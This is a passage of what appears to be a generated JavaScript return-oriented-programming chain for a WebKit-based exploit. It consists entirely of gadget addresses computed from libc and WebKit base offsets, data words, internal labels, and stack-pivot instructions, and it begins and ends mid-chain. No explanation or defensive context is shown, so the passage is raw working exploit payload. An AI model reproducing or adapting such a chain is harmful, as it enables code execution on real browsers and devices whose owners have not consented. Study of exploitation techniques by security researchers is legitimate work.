db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+220232, //L3833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+220248, //L3834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+220216, //L3832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3832:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3833:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3834:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+220408, //L3839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+220424, //L3840
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+220360, //L3836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3836:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3837:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3838:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3839:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3840:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+220536, //L3841+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+220528, //L3841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3841:
db([0, 0]); // 0x0
set_gadgets([
ropchain+220552, //L3841+24
ropchain+221504, //L3835
libc_base+764760, //pop rsi
ropchain+220592, //L3842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3842:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3844:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+220712, //L3847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+220696, //L3845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3845:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3847:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+220856, //L3850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+220824, //L3848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+220840, //L3849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3848:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3849:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3850:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+220952, //L3852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3851:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3852:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3853:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+221056, //L3854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+221072, //L3855
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3854:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3855:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+221248, //L3857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+221264, //L3858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+221232, //L3856
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3856:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3857:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3858:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+221408, //L3861
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+221424, //L3862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+221376, //L3859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3859:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3860:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3861:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3862:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+221496, //L3863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3863:
db([0, 0]); // 0x0
//L3835:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+221624, //L3866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+221640, //L3867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+221608, //L3865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3865:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3866:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3867:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+221752, //L3869
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+221800, //L3872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+221768, //L3870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3869:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3870:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3871:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3872:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+221912, //L3873+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+221904, //L3873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3873:
db([0, 0]); // 0x0
set_gadgets([
ropchain+221928, //L3873+24
ropchain+223952, //L3868
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+221968, //L3874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3874:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3875:
db([48, 0]); // 0x30
set_gadget(libc_base+144605,); //pop rdi
//L3876:
db([48, 0]); // 0x30
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+222160, //L3880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+222128, //L3878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+222144, //L3879
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3877:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3878:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3879:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3880:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+222216, //L3882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3882:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+222344, //L3884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+222360, //L3885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+222328, //L3883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3883:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3884:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3885:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+222456, //L3887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+222440, //L3886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3886:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3887:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+222536, //L3888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3888:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3890:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+222656, //L3893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+222640, //L3891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3891:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3893:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+222800, //L3896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+222768, //L3894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+222784, //L3895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3894:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3895:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3896:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+222872, //L3898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3898:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+222928, //L3899
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3899:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+223008, //L3901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3901:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3903:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+223128, //L3906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+223112, //L3904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3904:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3906:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+223272, //L3909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+223240, //L3907
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+223256, //L3908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3907:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3908:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3909:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+223360, //L3911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3910:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3911:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+223416, //L3912
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3912:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3914:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+223496, //L3916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3916:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+223600, //L3917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+223616, //L3918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3917:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3918:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+223704, //L3920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3920:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+223760, //L3921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3921:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+223832, //L3924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3924:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+223888, //L3925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3925:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+223968, //L3927
//L3868:
libc_base+782311, //pop rsp
ropchain+223984, //L3928
//L3927:
libc_base+782311, //pop rsp
ropchain+219096, //L3806
//L3928:
//L3929:
libc_base+764760, //pop rsi
ropchain+224024, //L3930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3930:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3932:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+224144, //L3935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+224128, //L3933
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3933:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3935:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+224320, //L3938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+224336, //L3939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+224288, //L3936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+224304, //L3937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3936:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3937:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3938:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3939:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+224432, //L3941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+224416, //L3940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3940:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3941:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3942:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3943:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3944:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+224632, //L3946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3946:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+224688, //L3947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3947:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+224824, //L3951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+224808, //L3950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3949:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3950:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3951:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+224928, //L3954
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+224960, //L3956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3953:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3954:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3955:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3956:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+225072, //L3957+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+225064, //L3957
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3957:
db([0, 0]); // 0x0
set_gadgets([
ropchain+225088, //L3957+24
ropchain+226480, //L3952
libc_base+764760, //pop rsi
ropchain+225128, //L3958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3958:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3960:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+225248, //L3963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+225232, //L3961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3961:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3963:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+225392, //L3966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+225360, //L3964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+225376, //L3965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3964:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3965:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3966:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+225472, //L3967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3967:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3969:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+225592, //L3972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+225576, //L3970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3970:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3972:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+225768, //L3975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+225784, //L3976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+225736, //L3973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+225752, //L3974
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3973:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3974:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3975:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3976:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+225944, //L3980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+225912, //L3978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+225928, //L3979
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3977:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3978:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3979:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3980:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+226032, //L3981
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+226048, //L3982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3981:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3982:
db([0, 0]); // 0x0
set_gadgets([
